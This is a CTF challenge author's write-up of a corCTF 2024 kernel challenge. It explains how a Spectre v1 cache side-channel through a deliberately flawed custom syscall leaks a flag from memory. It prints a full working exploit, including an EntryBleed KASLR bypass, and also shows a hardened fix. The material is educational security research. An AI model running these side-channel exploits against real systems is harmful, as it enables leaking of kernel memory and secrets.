Sunday, August 4, 2024

corCTF 2024: Its Just a Dos Bug Bro - Leaking Flags from Filesystem with Spectre v1

Following the theme of corCTF 2023, I wanted to release another exploitation challenge that connects kernel internals and modern x86_64 micro-architectural attacks. This year, players were presented with the following new syscalls on Linux 6.9.0.

#include <linux/kernel.h>
#include <linux/init.h>
#include <linux/sched.h>
#include <linux/syscalls.h>
#include <linux/string.h>

char corctf_note[0x10] = {0};

SYSCALL_DEFINE2(corctf_write_note, char *, addr, size_t, size)
{
    if (size > sizeof(corctf_note) - 1)
        return -EINVAL;
    return copy_from_user(corctf_note, addr, size);
}

SYSCALL_DEFINE4(corctf_read_note, char *, addr, uint64_t, idx1, uint64_t, idx2, uint64_t, stride)
{
    /* note: this read happens before the bounds check below */
    uint64_t off = corctf_note[idx1];
    if (strlen(corctf_note) > idx1 && strlen(corctf_note) > idx2) {
        return copy_to_user(addr + (off << stride), corctf_note + idx2, 1);
    } else {
        return -EINVAL;
    }
}

The kernel only ran off of an initramfs with the following QEMU boot command:  

#!/bin/sh
qemu-system-x86_64 \
    -s \
    -m 512 \
    -smp 1 \
    -nographic \
    -kernel "bzImage" \
    -append "console=ttyS0 loglevel=3 panic=-1 oops=panic clearcpuid=smap pti=on no5lvl" \
    -no-reboot \
    -netdev user,id=net \
    -cpu host \
    -initrd "./initramfs.cpio.gz" \
    -enable-kvm

As mentioned to the players, the challenge was hosted on an i5-8250U, an 8th generation Intel CPU (though the exploit also worked locally on 9th and 10th generation CPUs). I also made it clear that players should set the Linux scaling_governor to performance (echo performance | sudo tee /sys/devices/system/cpu/cpu*/cpufreq/scaling_governor) - the intended micro-architectural side-channel exploit struggled to work reliably in powersave mode.

Based on the syscall implementation, there is a pretty clear OOB read bug in corctf_read_note: corctf_note[idx1] is read before the bounds check. Hopefully, no one tried to rely solely on that vulnerability to write an LPE exploit. I'm pretty sure it can only result in a DoS due to oops=panic, but if you can pwn the Linux kernel with only one use of this primitive, please contact me.

This syscall implementation also has a side-channel problem. The access of the user-controlled buffer in copy_to_user depends on a value derived from a user-controlled index. Through the unchecked index, an attacker can deduce the value of any memory location relative to corctf_note with a cache side-channel. If one were to evict the entire user buffer from the CPU cache hierarchy beforehand, then this syscall would bring a region of it back into the cache with the off-dependent access. An attacker can then measure access times over the buffer and determine the original value of off based on which region is fastest to access. This leaks memory contents, as the value of off comes from the unchecked index into corctf_note.

One might wonder how the user buffer would even be accessed given an OOB index. After all, there is a conditional check that blocks OOB accesses. This is where the original insight from Spectre v1 comes in. Modern CPUs are extremely aggressive with optimizations and execute as many instructions as far in advance as possible - it's perfectly fine to execute instructions out of order internally as long as the final results remain architecturally correct. Conditional branches awaiting resolution can't just halt the entire pipeline, so modern micro-architectures employ a branch predictor that assumes a direction based on history at the branch address. Sometimes the prediction is wrong, so the CPU has to roll back state, but micro-architectural state such as cache contents is not rolled back (it would be very hard to do so without seriously hindering performance).

In this case, if one were to train this branch to always take the copy_to_user path, then an OOB index will cause that path to be taken transiently. The cache side-channel becomes a race between branch resolution (which depends on the calls to strlen on corctf_note) and the caching of the off-dependent user buffer address (which depends on the speed of the shift calculation and the MMU's resolution of the buffer's virtual address).

One common misconception I observed during the CTF was people thinking that KPTI and modern kernel mitigations have fixed Spectre v1. This is simply not true: KPTI was meant to address Meltdown (and not even completely), and Spectre v1 cannot be mitigated wholesale, as branch prediction is a fundamental modern CPU optimization. As discussed in a Linux kernel document, one can mitigate Spectre v1 with the help of the nospec macro family (like array_index_nospec), which clamps indices without branching so that mis-speculation cannot reach out-of-bounds addresses, or with the usage of certain barriers. None of that exists in the custom syscall above. Technically, I believe the clac and stac instructions used by usercopy functions to disable and re-enable SMAP have barrier-like semantics, but I disabled SMAP in the kernel boot params above.
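For illustration, here is a minimal sketch (my own, not the challenge's code) of how the read path could have been hardened - the architectural OOB read moves behind the bounds check, and array_index_nospec clamps both indices to the checked bound even under mis-speculation:

#include <linux/nospec.h>

SYSCALL_DEFINE4(corctf_read_note, char *, addr, uint64_t, idx1, uint64_t, idx2, uint64_t, stride)
{
    size_t len = strlen(corctf_note);

    if (len > idx1 && len > idx2) {
        /* clamp both indices so that even a mis-predicted branch
         * cannot speculatively index past the checked bound */
        idx1 = array_index_nospec(idx1, len);
        idx2 = array_index_nospec(idx2, len);
        return copy_to_user(addr + ((uint64_t)corctf_note[idx1] << stride),
                            corctf_note + idx2, 1);
    }
    return -EINVAL;
}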

One last piece of the puzzle remains - how can we use Spectre v1 to leak the flag? Well, initramfs is always loaded in RAM, and it's loaded very early on, so its physical location isn't affected by randomization (at least based on my observations). Given a kernel KASLR leak and a physmap base leak, we can then compute the offset necessary to side-channel out the flag.
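Concretely, the evil index handed to the syscall is just the distance from corctf_note to the flag's page in the kernel direct map. A sketch of the arithmetic, using the names and offsets from the final exploit shown later (NOTE_OFFSET and flag_offset are build- and boot-specific):

// sketch of the address arithmetic from the final exploit below
uint64_t note      = kaslr_base + NOTE_OFFSET;    // corctf_note in kernel data
uint64_t flag_addr = physmap_base + flag_offset;  // initramfs flag page in the physmap
uint64_t evil_idx  = flag_addr - note;            // OOB idx1 passed to corctf_read_note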

I created the following primitives to set up a Spectre v1 based side-channel given a user-controlled buffer.

Since we control the buffer, the easiest way to flush it from the cache on x86_64 is through the clflush instruction.

void clflush(void *addr)
{
    asm volatile(INTEL("clflush [%[addr]];")::[addr]"r"(addr):);
}

void flush_buffer(void *addr, size_t size)
{
    for (off_t i = 0; i < size; i += LINE_SIZE) {
        clflush(addr + i);
    }
}

To time accesses, I rely on the rdtscp instruction, and use memory fences to help ensure accuracy. 

static inline uint64_t time_access(void *addr)
{
    uint64_t time;
    asm volatile(INTEL(
        "mfence;"
        "rdtscp;"
        "lfence;"
        "mov rbx, rax;"
        "mov rax, %[addr];"
        "mov rax, qword ptr [rax];"
        "rdtscp;"
        "lfence;"
        "sub rax, rbx;"
        "mov %[time], rax;")
        :[time]"=r"(time):[addr]"r"(addr): "rax", "rdx", "rcx", "rbx", "rsi", "rdi");
    return time;
}

Now for the main “Spectre” function to train the branch predictor:

static inline uint64_t spectre(char *buffer, off_t offset, uint64_t idx, uint64_t train, uint64_t bound)
{
    for (int i = 0; i < strlen(tlb_smart_write); i++) {
        corctf_read(buffer, i);
    }

    for (int i = 0; i < train; i++) {
        corctf_read(buffer, 0xd);
    }

    flush_buffer((void *)buffer, MAP_SIZE);
    asm volatile ("mfence;");

    corctf_read(buffer, idx);
    return get_time(buffer, offset);
}

I set up tlb_smart_write to be \x01\x21\x41\x61\x81\xa1\xc1\xe1skibidi (apologies for the zoomer brainrot, I was under an extreme time crunch this year for corCTF development). The first for loop has the syscall use each of those values as the offset into the user buffer - as you will see later, I indexed into the user buffer by strides of 128 bytes (which provided cleaner results than 64 byte strides for me). Since the crafted values are 0x20 apart, shifting them left by 7 yields offsets 0x80, 0x1080, ..., 0x7080 - one access per 4 KiB page of the 32 KiB buffer - so this loop acts as a mechanism to have the buffer's virtual addresses resolved in the TLB beforehand (which helps win the aforementioned Spectre race window). Despite KPTI being on, modern Intel CPUs have the PCID feature as a performance optimization, so those addresses are not flushed from the TLB on user/kernel transitions.

Afterwards, I trained the branch predictor a few times, flushed the entire user buffer from the cache hierarchy, triggered a mis-speculation with an evil index, and timed the access to a pre-specified offset in the buffer. Note that the index selects the memory location we want to leak, and offset is the address in the user buffer we are currently timing for data collection.

With the above building blocks, I created the following side-channel primitive:

uint64_t sidechannel(char *buffer, uint64_t train, uint64_t evil, uint64_t bound)
{
    uint64_t time[CHAR_SPACE] = {0};

    for (int times = 0; times < ITERS; times++) {
        for (uint32_t i = 0; i < bound; i++) {
            uint64_t t = spectre(buffer, i * STRIDE, evil, train, bound);
            if (t < THRESHOLD)
                time[i]++;
        }
    }

    uint64_t max_val = 0, max = -1;
    for (int i = 0; i < bound; i++) {
        if (time[i] > max_val) {
            max = i;
            max_val = time[i];
        }
    }

    if (max != -1) {
        for (int i = 0; i < bound; i++) {
            printf("0x%02x: %lu, ", i, time[i]);
            if ((i + 1) % 16 == 0) {
                puts("");
            }
        }
        puts("");
    }

    return max;
}

It is always better to use a threshold scoring technique, as seen above, in micro-architectural side-channels, since averages are too susceptible to noise and outliers. While this might not matter much here - DRAM accesses have quite a large timing difference compared to cached accesses - threshold scoring would fare much better if clflush were unavailable. Rather than evicting the buffer from the L3 cache into DRAM by "filling" the L3 cache one to two times over (caches are not truly LRU and have other replacement heuristics), we could just evict the buffer from the L1 and L2 caches, which takes substantially fewer accesses. The smaller L2-to-L3 timing difference can then still be noticed through a threshold metric.
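A minimal sketch of that cheaper eviction approach, assuming 64-byte lines and a hypothetical 1 MiB L2 - a real attack would build proper eviction sets targeting the victim buffer's cache sets rather than sweeping a whole pool:

#define LINE_SIZE 64                 // cache line size, as in the exploit
#define L2_ASSUMED (1 << 20)         // assumed 1 MiB L2 capacity
#define EVICT_SIZE (4 * L2_ASSUMED)  // oversized pool to displace L1/L2

static unsigned char evict_pool[EVICT_SIZE];

// sweep the pool at cache-line granularity; with high probability this
// displaces the victim buffer's lines from L1/L2 while L3 keeps a copy
void evict_l1_l2(void)
{
    for (size_t i = 0; i < EVICT_SIZE; i += LINE_SIZE) {
        *(volatile unsigned char *)&evict_pool[i] += 1;
    }
}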

Now, armed with all these primitives, we can construct a Spectre v1 exploit to leak the flag from the filesystem cache.

To leak the kernel physmap base, we can just side-channel out the contents of page_offset_base, which sits at a fixed offset from corctf_note since both are in the kernel data section. I noticed that page_offset_base's address also seems to be cached (at least in the TLB), as the kernel probably uses addresses near it quite frequently. A similar idea would work with a kernel text/data pointer to leak KASLR. However, I opted for an easier approach with the EntryBleed KASLR bypass side-channel, which I discuss in this post and in this paper.

With both address leaks in hand and knowledge of the flag file's offset from physical memory base (which can be determined beforehand through a memory search in QEMU monitor mode), the flag can be leaked. Here is the final exploit:

#include <stdio.h>
#include <stdbool.h>
#include <stdlib.h>
#include <stdint.h>
#include <unistd.h>
#include <errno.h>
#include <fcntl.h>
#include <string.h>
#include <sys/mman.h>
#include <sys/syscall.h>

#define __NR_CORCTF_WRITE 462
#define __NR_CORCTF_READ 463

#define LINE_SIZE 64
#define STRIDE_SHIFT 7
#define STRIDE (1 << STRIDE_SHIFT)
#define MAP_SIZE STRIDE * 256
#define CACHE_SIZE 24 * (1 << 21)
#define CHAR_SPACE 256

#define INTEL(x) \
    ".intel_syntax noprefix;" \
    x \
    ".att_syntax;"

uint8_t tlb_smart_write[0x10] = "\x01\x21\x41\x61\x81\xa1\xc1\xe1skibidi";

void fail(char *msg)
{
    perror(msg);
    exit(1);
}

uint64_t entrybleed(uint64_t addr)
{
    uint64_t a, b, c, d;
    asm volatile (".intel_syntax noprefix;"
        "mfence;"
        "rdtscp;"
        "mov %0, rax;"
        "mov %1, rdx;"
        "xor rax, rax;"
        "lfence;"
        "prefetchnta qword ptr [%4];"
        "prefetcht2 qword ptr [%4];"
        "xor rax, rax;"
        "lfence;"
        "rdtscp;"
        "mov %2, rax;"
        "mov %3, rdx;"
        "mfence;"
        ".att_syntax;"
        : "=r" (a), "=r" (b), "=r" (c), "=r" (d)
        : "r" (addr)
        : "rax", "rbx", "rcx", "rdx");
    a = (b << 32) | a;
    c = (d << 32) | c;
    return c - a;
}

#define STEP 0x100000ull
#define SCAN_START KERNEL_LOWER_BOUND + entry_SYSCALL_64_offset
#define SCAN_END KERNEL_UPPER_BOUND + entry_SYSCALL_64_offset
#define KERNEL_LOWER_BOUND 0xffffffff80000000ull
#define KERNEL_UPPER_BOUND 0xffffffffc0000000ull
#define entry_SYSCALL_64_offset 0x1000000ull
#define DUMMY_ITERATIONS 5
#define ITERATIONS 100
#define ARR_SIZE (SCAN_END - SCAN_START) / STEP

uint64_t leak_syscall_entry(void)
{
    uint64_t data[ARR_SIZE] = {0};
    uint64_t min = ~0, addr = ~0;

    for (int i = 0; i < ITERATIONS + DUMMY_ITERATIONS; i++) {
        for (uint64_t idx = 0; idx < ARR_SIZE; idx++) {
            uint64_t test = SCAN_START + idx * STEP;
            syscall(104); // any cheap syscall to warm the kernel entry's TLB entry
            uint64_t time = entrybleed(test);
            if (i >= DUMMY_ITERATIONS)
                data[idx] += time;
        }
    }

    for (int i = 0; i < ARR_SIZE; i++) {
        data[i] /= ITERATIONS;
        if (data[i] < min) {
            min = data[i];
            addr = SCAN_START + i * STEP;
        }
    }

    return addr;
}

uint64_t leak_kaslr(void)
{
    return leak_syscall_entry() - entry_SYSCALL_64_offset;
}

long corctf_write(char *addr, uint64_t size)
{
    return syscall(__NR_CORCTF_WRITE, addr, size);
}

long corctf_read(char *addr, uint64_t idx)
{
    return syscall(__NR_CORCTF_READ, addr, idx, 0, STRIDE_SHIFT);
}

void clflush(void *addr)
{
    asm volatile(INTEL("clflush [%[addr]];")::[addr]"r"(addr):);
}

void flush_buffer(void *addr, size_t size)
{
    for (off_t i = 0; i < size; i += LINE_SIZE) {
        clflush(addr + i);
    }
}

static inline uint64_t time_access(void *addr)
{
    uint64_t time;
    asm volatile(INTEL(
        "mfence;"
        "rdtscp;"
        "lfence;"
        "mov rbx, rax;"
        "mov rax, %[addr];"
        "mov rax, qword ptr [rax];"
        "rdtscp;"
        "lfence;"
        "sub rax, rbx;"
        "mov %[time], rax;")
        :[time]"=r"(time):[addr]"r"(addr): "rax", "rdx", "rcx", "rbx", "rsi", "rdi");
    return time;
}

static inline uint64_t get_time(char *buffer, off_t offset)
{
    return time_access(buffer + offset);
}

#define TRAIN 7
static inline uint64_t spectre(char *buffer, off_t offset, uint64_t idx, uint64_t train, uint64_t bound)
{
    for (int i = 0; i < strlen(tlb_smart_write); i++) {
        corctf_read(buffer, i);
    }

    for (int i = 0; i < train; i++) {
        corctf_read(buffer, 0xd);
    }

    flush_buffer((void *)buffer, MAP_SIZE);
    asm volatile ("mfence;");

    corctf_read(buffer, idx);
    return get_time(buffer, offset);
}

#define THRESHOLD 100
#define ITERS 1000
uint64_t sidechannel(char *buffer, uint64_t train, uint64_t evil, uint64_t bound)
{
    uint64_t time[CHAR_SPACE] = {0};

    for (int times = 0; times < ITERS; times++) {
        for (uint32_t i = 0; i < bound; i++) {
            uint64_t t = spectre(buffer, i * STRIDE, evil, train, bound);
            if (t < THRESHOLD)
                time[i]++;
        }
    }

    uint64_t max_val = 0, max = -1;
    for (int i = 0; i < bound; i++) {
        if (time[i] > max_val) {
            max = i;
            max_val = time[i];
        }
    }

    if (max != -1) {
        for (int i = 0; i < bound; i++) {
            printf("0x%02x: %lu, ", i, time[i]);
            if ((i + 1) % 16 == 0) {
                puts("");
            }
        }
        puts("");
    }

    return max;
}

uint8_t leak_byte_helper(char *buffer, uint64_t offset, uint64_t bound)
{
    uint64_t result = -1;
    printf("Attempting to leak offset 0x%lx\n", offset);
    while (result == -1) {
        result = sidechannel(buffer, TRAIN, offset, bound);
        if (result == -1)
            printf("retrying for offset 0x%lx\n", offset);
    }
    printf("Leaked: 0x%lx\n", result);
    return result;
}

uint8_t leak_byte(char *buffer, uint64_t offset, uint64_t bound)
{
    uint64_t first_leak = 0xdeadbabe;
    uint64_t second_leak = 0xdeadb00b;
    while (first_leak != second_leak) {
        first_leak = leak_byte_helper(buffer, offset, bound);
        second_leak = leak_byte_helper(buffer, offset, bound);
        if (first_leak != second_leak) {
            printf("mismatch in leak values: 0x%lx 0x%lx. retrying\n", first_leak, second_leak);
        }
    }
    return first_leak;
}

uint64_t leak_physmap(char *buffer, uint64_t offset)
{
    uint64_t qword = 0;
    for (int i = 3; i < 6; i++) {
        qword |= ((uint64_t)leak_byte(buffer, offset + i, 256)) << (i * 8);
    }
    qword |= 0xffff000000000000ull;
    return qword;
}

#define NOTE_OFFSET 0x24d2880ull
#define MAX_FLAG_LEN 0x100
#define NOTE_TO_POB 0xffffffffff329978ull

void main()
{
    char *flag = malloc(MAX_FLAG_LEN);
    char *buffer = mmap(0, MAP_SIZE, PROT_READ | PROT_WRITE, MAP_ANON | MAP_PRIVATE, -1, 0);
    if (!buffer || !flag) {
        fail("buffer allocation failed");
    }

    memset(flag, 0, MAX_FLAG_LEN);
    strcpy(flag, "corctf{");

    uint64_t kaslr_base = leak_kaslr();
    uint64_t note = kaslr_base + NOTE_OFFSET;
    printf("KASLR base: 0x%lx\n", kaslr_base);
    printf("note addr: 0x%lx\n", note);
    printf("page offset base: 0x%lx\n", note + NOTE_TO_POB);

    corctf_write(tlb_smart_write, strlen(tlb_smart_write));

    // bottom 3 bytes always 0, speed it up a bit
    uint64_t physmap_base = leak_physmap(buffer, NOTE_TO_POB);
    // uint64_t physmap_base = 0xffff888000000000ull;
    printf("physmap: 0x%lx\n", physmap_base);

    uint64_t flag_offset = 0x1f556000ull;
    // in case another page allocation happened beforehand
    while (leak_byte(buffer, physmap_base + flag_offset - note, 256) != flag[0]) {
        puts("wrong first flag char, incrementing flag_offset");
        flag_offset += 0x1000;
    }

    int i = strlen(flag);
    uint8_t temp = 0;
    while ((temp = leak_byte(buffer, physmap_base + flag_offset + i - note, 0x80)) != '}') {
        flag[i++] = temp;
    }
    flag[i] = '}';

    printf("flag: %s\n", flag);
}

The flag takes about 5-10 minutes to fully leak, and that's with some optimizations, such as relying on the flag format and on the known range of physmap under 4-level paging.

I originally had a harder version of this challenge too, themed around being completely bug-free rather than "just a DoS bug".

The syscall looked like this: 

SYSCALL_DEFINE4(corctf_read_note, char *, addr, uint64_t, idx1, uint64_t, idx2, uint64_t, stride)
{
    if (strlen(corctf_note) > idx1 && strlen(corctf_note) > idx2) {
        uint64_t off = corctf_note[idx1] << stride;
        return copy_to_user(addr + off, corctf_note + idx2, 1);
    } else {
        return -EINVAL;
    }
}

Now, there is never any architectural OOB access. However, this is a harder side-channel to perform - since the flag's page-cache address is not in the CPU cache (and perhaps not in the TLB either), it would be extremely difficult for speculative execution to progress deep enough to leave a cache side effect on the user buffer. One way to go about this would be to prolong the speculation window by evicting corctf_note itself from the L3 cache and TLB, but the side-channel would probably take too long at that point given normal system noise. Instead, I kept the file contents in cache with a "flag verifier daemon" - this version did work, but the side-channel success rate was still much lower. Since it didn't really introduce any new concepts and just required players to do more fine-tuning, I opted for the easier version of the challenge instead.
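The daemon itself isn't included in this post, but conceptually it only needs to keep the flag's bytes hot in the cache. A minimal sketch, assuming a hypothetical /root/flag.txt path:

#include <stdio.h>
#include <string.h>
#include <unistd.h>

int main(void)
{
    char buf[256];
    for (;;) {
        FILE *f = fopen("/root/flag.txt", "r"); // hypothetical flag path
        if (f) {
            if (fgets(buf, sizeof(buf), f)) {
                // "verifying" the prefix pulls the flag bytes through
                // the CPU data cache on every iteration
                (void)strncmp(buf, "corctf{", 7);
            }
            fclose(f);
        }
        usleep(10000); // re-touch the flag every 10 ms
    }
}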

Overall, I thought this was a really nifty challenge to write, and I hope it brought something refreshing to the pwnable category in CTFs. I would like to give a huge shoutout to sampriti for taking first blood on this challenge. Zolutal from Shellphish claimed the second and final solve.

Some other challenges I wrote this year for corCTF included trojan-turtles, an L2 guest to L1 hypervisor KVM escape, and vmquack's combinator in collaboration with anematode, a functional programming VM built around normal-order evaluation of untyped lambda calculus. I didn't make a writeup for the latter, as the three solves pretty much all came down to pattern matching and replacement, which I somewhat expected. It's a shame, though, since it involved the highest development effort. I was inspired by this article to write a Scheme to lambda calculus compiler, but the ultimate bottleneck for the crackme's complexity was the poor runtime reduction performance.

I am looking forward to what comes next in development for corCTF 2025! Feel free to let me know if you have any questions or spot any mistakes, and hopefully I'll see some of you at the Defcon Finals afterparty.
